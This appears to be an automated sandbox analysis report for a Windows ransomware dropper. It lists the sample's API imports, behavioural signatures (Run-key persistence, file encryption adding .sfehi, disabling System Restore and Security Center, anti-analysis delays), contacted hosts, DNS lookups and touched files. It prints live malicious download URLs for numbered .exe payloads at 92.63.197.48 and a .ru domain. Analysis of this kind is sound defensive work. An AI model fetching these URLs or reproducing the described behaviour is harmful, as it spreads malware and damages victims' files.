DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3750816931.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 4032832645.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2459023548.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2400240831.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/1.exe
suspicious_request: http://92.63.197.48/m/2.exe
suspicious_request: http://92.63.197.48/m/3.exe
suspicious_request: http://92.63.197.48/m/4.exe
suspicious_request: http://92.63.197.48/m/5.exe
suspicious_request: http://92.63.197.48/1.exe
suspicious_request: http://92.63.197.48/2.exe
suspicious_request: http://92.63.197.48/3.exe
suspicious_request: http://92.63.197.48/4.exe
suspicious_request: http://92.63.197.48/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/m/1.exe
url: http://92.63.197.48/m/2.exe
url: http://92.63.197.48/m/3.exe
url: http://92.63.197.48/m/4.exe
url: http://92.63.197.48/m/5.exe
url: http://92.63.197.48/1.exe
url: http://92.63.197.48/2.exe
url: http://92.63.197.48/3.exe
url: http://92.63.197.48/4.exe
url: http://92.63.197.48/5.exe
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 6.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00019c00, virtual_size: 0x00019a10
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: 1717238076.exe (1352) called API NtClose 500152 times
Spam: 1865041414.exe (2884) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
Exhibits possible ransomware file modification behavior
mass file_deletion: Appears to have deleted 202 files indicative of ransomware or wiper malware deleting files to prevent recovery
file_modifications: Performs 200 file moves indicative of a potential file encryption process
drops_unknown_mimetypes: Drops 277 unknown file mime types which may be indicative of encrypted files being written back to disk
appends_new_extension: Appends a new file extension to multiple modified files
new_appended_file_extension: .sfehi
Creates a hidden or system file
file: C:\Windows\5769805074060605
file: C:\Windows\5769805074060605\winsvcs.exe
file: C:\Windows\806084767800850
file: C:\Windows\806084767800850\winsvcs.exe
file: C:\a4889873a4889f9232.lock
file: C:\$Recycle.Bin\a4889873a4889f9232.lock
file: C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\a4889873a4889f9232.lock
file: C:\Documents and Settings\a4889873a4889f9232.lock
file: C:\Drivers\a4889873a4889f9232.lock
file: C:\Hotfix\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\x64\a4889873a4889f9232.lock
file: C:\Hotfix\LocalPack\x86\a4889873a4889f9232.lock
file: C:\Hotfix\Update\a4889873a4889f9232.lock
file: C:\Hotfix\Update\x64\a4889873a4889f9232.lock
file: C:\Hotfix\Update\x86\a4889873a4889f9232.lock
file: C:\MSOCache\a4889873a4889f9232.lock
file: C:\PerfLogs\a4889873a4889f9232.lock
file: C:\PerfLogs\Admin\a4889873a4889f9232.lock
file: C:\Program Files\a4889873a4889f9232.lock
file: C:\Program Files (x86)\a4889873a4889f9232.lock
file: C:\Python27\a4889873a4889f9232.lock
file: C:\Python27\DLLs\a4889873a4889f9232.lock
file: C:\Python27\Doc\a4889873a4889f9232.lock
file: C:\Python27\include\a4889873a4889f9232.lock
file: C:\Python27\Lib\a4889873a4889f9232.lock
file: C:\Python27\Lib\bsddb\a4889873a4889f9232.lock
file: C:\Python27\Lib\bsddb\test\a4889873a4889f9232.lock
file: C:\Python27\Lib\compiler\a4889873a4889f9232.lock
file: C:\Python27\Lib\ctypes\a4889873a4889f9232.lock
file: C:\Python27\Lib\ctypes\macholib\a4889873a4889f9232.lock
Checks the CPU name from registry, possibly for anti-virtualization
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\5769805074060605\winsvcs.exe
Attempts to disable System Restore
Drops a binary and executes it
binary: C:\Users\user\AppData\Local\Temp\2293722122.exe
binary: C:\Users\user\AppData\Local\Temp\1717238076.exe
binary: C:\Users\user\AppData\Local\Temp\3065331339.exe
binary: C:\Users\user\AppData\Local\Temp\2673932424.exe
binary: C:\Users\user\AppData\Local\Temp\1398632723.exe
binary: C:\Users\user\AppData\Local\Temp\1257032286.exe
binary: C:\Users\user\AppData\Local\Temp\3750816931.exe
binary: C:\Users\user\AppData\Local\Temp\1865041414.exe
binary: C:\Users\user\AppData\Local\Temp\1227434603.exe
binary: C:\Users\user\AppData\Local\Temp\1495120250.exe
binary: C:\Users\user\AppData\Local\Temp\2459023548.exe
binary: C:\Users\user\AppData\Local\Temp\4032832645.exe
binary: C:\Users\user\AppData\Local\Temp\3876917383.exe
binary: C:\Windows\5769805074060605\winsvcs.exe
binary: C:\Windows\806084767800850\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\1674315261.exe
binary: C:\Users\user\AppData\Local\Temp\2080821079.exe
binary: C:\Users\user\AppData\Local\Temp\2810629864.exe
binary: C:\Users\user\AppData\Local\Temp\2841536727.exe
binary: C:\Users\user\AppData\Local\Temp\1674519319.exe
binary: C:\Users\user\AppData\Local\Temp\3304035876.exe
binary: C:\Users\user\AppData\Local\Temp\3751939260.exe
binary: C:\Users\user\AppData\Local\Temp\2400240831.exe
binary: C:\Users\user\AppData\Local\Temp\2686919881.exe
Attempts to modify or disable Security Center warnings

Screenshots


Hosts

Direct | IP | Country Name
N | 92.63.197.48 | Russian Federation
Y | 8.8.8.8 | United States

DNS

Name | Response | Post-Analysis Lookup
slpsrgpsrhojifdij.ru | A 92.63.197.48 |
osheoufhusheoghuesd.ru | NXDOMAIN |

Summary

C:\Python27\include\tupleobject.h
C:\Python27\include\ucnhash.h
C:\Python27\include\unicodeobject.h
C:\Python27\include\warnings.h
C:\Python27\include\weakrefobject.h
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\aifc.py
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\argparse.py
C:\Python27\Lib\ast.py
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\binhex.py
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_queue.py
